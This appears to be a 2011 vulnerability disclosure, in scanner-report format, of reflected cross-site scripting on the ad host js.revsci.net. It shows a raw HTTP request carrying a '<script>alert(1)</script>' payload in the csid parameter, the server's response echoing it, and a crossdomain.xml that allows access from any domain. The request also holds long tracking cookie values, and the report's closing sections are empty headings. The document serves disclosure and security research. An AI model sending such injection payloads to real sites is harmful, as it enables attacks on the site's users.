XSS, Ad CDN, DORK Example, Cross Site Scripting, js.revsci.net

GET /gateway/gw.js?csid=I10985deae4<script>alert(1)</script>1124a3d6036&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ivillage.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; rsiPus_0="MLsXrEEucT5zIBH3Qpx+rOCHV9wTIf62V307nImZlEBw76YpcfzcZFr0RWvrtRsL1Wr8YdprMhhJd15eFUYGqJstP2duQv8PkdiB0lhkBml9ADYHA1ooiLCxxE4ZbZ6dBJlUHDgyYQ0dWGNgk2mU/6IWZPFutmXvjkfCaZ8XNFt00xjNbdPTO5Zy3pjFEXPPiN9sqakOxmiPznF2pe+333CVmVWtapVbuhz0jSjKWdMeE2eBsBSvtYkc0fmomYLtyi+Lts1umyzd9z/SrKTmNmTnFBMFArLCfjigahHLEoWhBrWvrSf8IrxyRfMTPFuk5iOzQgPN/kcU9HlxpNtUXKVd6mKr30sFlylIwkI9VjAWygBVrOHtwrSI7YvNNUqNCBU5c3lYOKS3+UBPVKDwLi0H3JXAmFxwbNP3r+5Rck+Pdm9kW/4="; NETSEGS_A09802=3161248fde72e26b&A09802&0&4d85fa5c&0&&4d608f7f&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d85fa7d&0&&4d6079fc&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d85ff07&0&&4d608185&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_I07714=3161248fde72e26b&I07714&0&4d87cbdc&0&&4d6207bf&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_E05516=3161248fde72e26b&E05516&0&4d87cc14&0&&4d61f497&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d87cc1e&0&&4d61ce1b&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J05531=3161248fde72e26b&J05531&0&4d87ccbf&0&&4d61e0ee&0383df689f9c2c8ede3ba30f48f38e86; rsi_us_1000000=pUMd4h9HORYYbVW36h3GjuO5F8Cz/ixbrri2GgYOGLS/IqjGr+Qo+iexxwPA/VIw0f2bCU+BNgLVkSuwP+Tj0c4s8TMyRqe8kfjSDk6IvTUIbKlALkPuuuLw9/DZZ6eK6gG24oOnihyimfcCk1VpOjBIn4e1g5CAbS8+FcJyxOqtsLfhWlt4lu+JFl+83+eTxuayWGN10ZCr1q/cwBg6FTe4z6rkZ918fXlCvvsmR9A95o4XVZSNc++EeIk9q2L3BsOiCndbwphnR33jF0SATn6wnvpipBopWcaJmMdE4WH0/IurWRich7jklB/MoKjj9klljIvR/ak38ptcZkRUhs4wo5GtLghLY0np205OuRnvAM9i4ppzY4Ag7FD6zJA2k1r70nkiotsEKNhxJRF1fN7GlosRhHj2INzY2zXMcfJ6HtTUkIK/hadeiLw11Liato8buRKvKPRkUnPgRNQOhNOcdItg/RCoFlC4l6MYFHoxgBCbwMEAUEoj0C3Y/UuOODncngytC8c0LhKvjOqMcXpZRSQ7iXxjhlkQYlgx86n+As4KNtnnZr7kDXbMI4InAY9RwSTXhVRzCcfNwOM+0tuU8Y3A7xfZKRlOWNTtSbN5cTpkSd80IyHhywlb5uqQy+798QHsyr776O/a9/xcCM+bk57n6Lz2Z/U3rQ6/r9le5h0Ky3lp8R5Sh5W6Aa18cZvMUVQYX8q/BSJVUpF+K83BbGZuRGWxfD4UqzTiGbmddQesacYU++Fc4Jbz+DDX/qrr4xWl6K+B6zzFTEsSYbwtFAMChrUGP7lQOpqWjlcK9Q8rBT+3rYbNX4tJEbuEvrKUzZ1uWKGVPysSxIAnY2vYmqrnDpGv3FxI15vcc/J7MM7Ua8P90fMGJstVYj50hGKGDXoSGfCS5a7qV1D3rsrADfIxTtqAV5Vp3u5wU1LqIqdP94qTYVoS1x6Tb4EGmJ8X3Ql39iQqlQmtBoe9SgUPNHvM07E6XFdGh8qwJCt5qOiKl54DX2/4S47w/3UISrNS9BRYlCVARrJAkQ+tggFnoC0ws4xxdga5ttcPYBdI4MAJHZ6U8lBC03+N9hpuxD7uPgpECBVFmhFT8lE5tlsQrH4tbwixtYSxf4rwaD+BcPGk0yTWKxJhqur/MSR2V8faJTvujWMHi9cMMudWo624gq+S8GiNpnTrGEiYUhB5hjhfHqQGDrF1RZll3RbguxtXqT2B/ISVSxHWWFIbAg8404Px3vBcnf0k3+TNIfnIs1Yqth2P0UoaBqKmWV/341huVebXxW+w3sqV6G2klLWzvSXaKEP2vAQyqRFIDtF5TJJgoUhgDZ5pH2nAk7aGqJS249ZndBUDZa5AyEgTMzFVQLS2pUVob9+nGXuWrvIVfBLl3jrF97r76TTTdzMIAqk5rTQPPtIXLgZyR4u+KDgHz+K+GDaGHjo61zeVw0Sgn64wrKRg3WPMxfN2EILzlBalDfOKVSyYKLgxkvxgcskgxQIMZoNciDxembLQeoHLe7gt30bz720TXQC8ZiW0iKe2YpTCsi+UzcBBoehaFohQaCIwgseqPSY+O5J8J5ZzrDT8a/NCKiEZGAajQ+1s34zVzV7VSHHzqb/SUKEeiaj3MDrO+z1IKyKziHxy1CWidRRGtn7LY3enGxynKU53b1wZe/Q1whidYiFBmCn3jbLiUxenYg==; NETSEGS_K05540=3161248fde72e26b&K05540&0&4da05927&0&&4d79b711&0383df689f9c2c8ede3ba30f48f38e86; rtc_Tiuf=MLsPtwMJITprJ5GuE9edm2kXrwSwbP8Jra56tafxubqeLvYIAc29ALVuUGZ7ylAzgMit84WgVV05COvZ6AG3BGXpdnnSxQw7tO52pBQBAwBJ6CzbDur2QfnoP6KenJqerRvZjxDqvgcbCpaChawKN060e7oEGtxbsLcKwU4+aBwdE6EK4rRCkUDx/R3aMk/MWWxLgiT+SmTBltwopY9C7KWwoDRJCMIu4Zhn+MMY5qMXU7HnV3HG5Z12+Fb2o658hikcr7vq7fTgdILly0wAbUcITLD8fvID+0ss5jk1WSqvgRHHM0cbc5Zk5npxP7kH/aejbDW6a/67QlaZSh2grW+5XfYrVyJiL2S/Nb/TgeKpdNH/FLe80bv838g8aGI716GbVJf7Vq7kz95o2X7/EPLugHWS/9PF+atbHyAcFSQ+pXaEOt3hjKNRYZIOp0D2sseo5NRhZcCtDiN3bJJHRvyOTaFgTvrrfh/jRNde3h2d3S//JV0Xk56ln3qcqbyfsw7SvYZIXR+OatKWEsJ8DPiUQACxnOq7H02eMLGiUhyMO1XVK59Cm+HdjQmJvsGQN/IwI1XaKieHX9h9Ip+2/rfFvJaIDNZGKbx30LH50vVVGt83OhG8oFIOeisX5DzHpxCH+tTuh9XQTNpXSFrWs13K+3ECYv94j97ptBuT977mVwt06c9b8uYH9xL+5LjorEXHtMb947Wvvq/VjpUj2KUYY7sCrp35uO3xpv7LtYvJ+/0TgGKOscYEs+Ijjknm8LlW7L+NSQikiPLBxn4b0AStzmeAA0awyEWUwY+dl8a+waR9en4aTC+ebI6++ViGc/bxgB5HXy8hLJtLw5+lTzbWLYMlDYo7NpowBEq/9+MzdBDZdq+4mYPxqrsJ9wnHs7/o7tQZ+lP2jynjw78GT9ya+hPidcOEAb7xQYJS19W4wZ5OeAbXFhtXDBfo7u6urK8aXYHhkq5BS+re75YrEuEBKRBYlDXK/Qn3DJFPBndfofK1cfy+uix+a79uAiBra/fnjqMUpEDAA54qUGHQcyghWWwy3r3zVJ4OhDD63GWRHCrQD+zQp7lDGsrl1ZKx2WEKfVV6nnCKddVq+aPwRNFAjze/+1nwZKlodi6xrbFc8pbsIrMMk1GRN5UFA9RAaDBbZWrukQNUkUvtrqpHBaR+JPb3SMcCSIBovUv3ThnzspQtrzBo9kJn25YJtQvRYiU4EaW/u0SIz6XDxTAN65b9cb4XUHn6JhCcmy5rgJzkL3hAjyAMYLng6vwmfmhxblOuL6F6j2y4Emid+O2XItiqaxpGGk2lJ8AFUAo6Ng90eJFW5W51zzcKn3Lo/QQJXp4HdZQ7je/UxBfhGQcMzKTdApPmKNcewpPU+eDJd9r7d6rFNml7lRc3J8XmqyFAE9UQcUbFaK/7JpUAUfTOpGbTQghS9W/iSwgTAIOHOwQ1ccn1ufs9E8we1n+eu3aGKrhQzmBdTTldgIzFcg3dlH6C9jBK; rsi_segs_1000000=pUPF40+hegIMpzaxu2F29/yoS4NYGua3aLaaz30Isdn5vw/ZUsicc4VLatz2X2BRF3d+aEcgNw+DpAzCd/RQ3/RbW5OxjYUOahEWtaoNrWIAMzP61PjGIOCmLyT1ZHz02lNY+E7BGlMKR/r6XGjeYs2Mr8952n6f82eVYlpUIiijnoiyBtzu62VStr65InYn4pkrB00nX9CkBLt8RFGU0iVMrS7XWskQ0v5SFBMuJ01uSeZAlzrDzSFc0sSZZKdlPS4BgCRstYmL9cWo/lm5bNe8qUtr1qJewEVZS7Q1Io0lLukzMplEWt3lLjwEfuC21r0J//J6q5wlJkWXP2fQ7Ks4jW3nWXlY45CF0VYG2iZF4untORZ+DORL9+6MNt5+ib0pKnkgAA9+MZzmgZXhNoKFfnU94NYaSq+k2Sn+tQ+twy849WyDPKFpHSmINOeKsw9uAh9cL4ToriwzJOy38QSTeCM7HKNpWyKPMftUY7Ly3aoXCvgFpN7NKlHIUhUIIyDlUWTQS9UlOYOucJ7sr7PawZTX+QESAKA3LJaoF8gr6SKzJIppYb+tWF/DV6QwWuu59lYgm1RJxu9VgshA/c32oNEUnWYz; udm_0=MLvv9CEJZjpv597JLoU3qJem9sEeAAPnI54bFVaqfFGBBSmvo6Je1wAljJ1InMm9W4m7zBzNPMdJ5PB6XH5GdSKPs3l9+yhuNXYoQIxya2hPHZDN8Xdv9ObR4/ULFsP4dYWVsJ4PsZzbmpfY1/o5krHRXT+TBas1zqk27NRlFcEWUcNBQK51cVuO5/xdzhis0I5Hna63Bkv2/STL5igc6jakPLdAdgSxVGSVOGJ5LEzIwgz69bkY++YdpYO6Ize8n5+jaaAowxX1vlriW+DP4Vn8ydo/+sTtKxCPYnL7Gbx/hSR082if40mhTmXXEB00KQuDjQqw94XkMU3i3EcLrYm6BeLyL20m7r/bCVDzsIfGQRGzOhFEQYAYIkBnrYD7mEuLowdhIUiBkXVeak59CP+5I/qrG7LqtBUGuD4UW1TBaUheZ0k9d0I4yCs4kqPa/5wUjxuSguYLQedl8l+j9ju6UZ1yi+nZ2urvxbcq0DCwYYtQUQGCC2bASfvWnomjm6otlU6ttUMR9T9qliUVM2oYUsCpAZq6hU7titmF/ZZsydwQE762RRMPOelZQCeGzlLZUYLxXq/DyMMDQpb/siexITo3ePiy2Q1ZumMFSe9/Qa5pw7PQNWn+ZVPr9s1rWyWV0/mrgJbtmTHf604y4PYAEpKSfxLvEKGsG95/E1TBM+D2gLL9ySgLmtD5HDSzamAzSCkqIIk37XEQ+5RQRzBMxsUrny8iIh3SJOEsIDXrEqD9kqtx3D3/9V0ZgDLuz5cZzn3T4rhNtb+xSPn7hpGT3qUFd4xqqXjiKldW3qsiCoKT5wqF2VrNeqku+L060HMwVVMPOn2X1o1851LUDJajfD7Hx3faEzr15ho5umjW2k7pg7U/AKurPztxKy80tVvsr1h8yW40qZud33YMnRff5ik8IbouKublppfZgDFgv8+h9+EjD3ChZBJBo0b+AqY0FN60wxUgHebPEGdKJzX+Lv5jmY4YM2aLI0+2/BO2sp+2YMwh4A/quo2U17BtImV8PHQ5UPp/ohofZrzZmhwB0WFkrAt3If7RartKaExj3Si9QMBX04brlSnaKEsxvN7YUF03RIY0iowAb6060edWjSh+QxaEKQlBIJt+6XGa8cw1HReIuAULEwwDJPe0/0hlAtijxthVJRCtNX3JEJrLSP3PrCNUGetWBEtBifbAwagejbN/jkDhxwuh163YITo0t6ToKuGeeFipr/rBEYK636NF3MJ/iBINsNeOLM6Via6dlaP9lNcl4bNwrd11+oAHhd/SfNS67Odt/3ceCSzgykN+eRcgNBeHNz6SMu/bOienN/lJeodFyQS7mIrPHlybuixROivTtliPyGTiR21oe/wevxc5LIylyfTdETUS7mTxUkQVVqp4GumhPBeYZgSAxD8TEchO3pEw7Tl9OCLnI6BXpUSUZKYCflPnhVGT1Rjf

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 12 Mar 2011 13:49:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 13 Mar 2011 13:49:48 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 12 Mar 2011 13:49:48 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "I10985DEAE4<SCRIPT>ALERT(1)</SCRIPT>1124A3D6036" was not recognized.
*/

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 12 Mar 2011 13:49:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

XSS, Ad CDN, DORK Example, Cross Site Scripting, js.revsci.net

The API is used by an application that may be XSS'd, test the Application :->

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Summary

Issue detail

Issue background

Issue remediation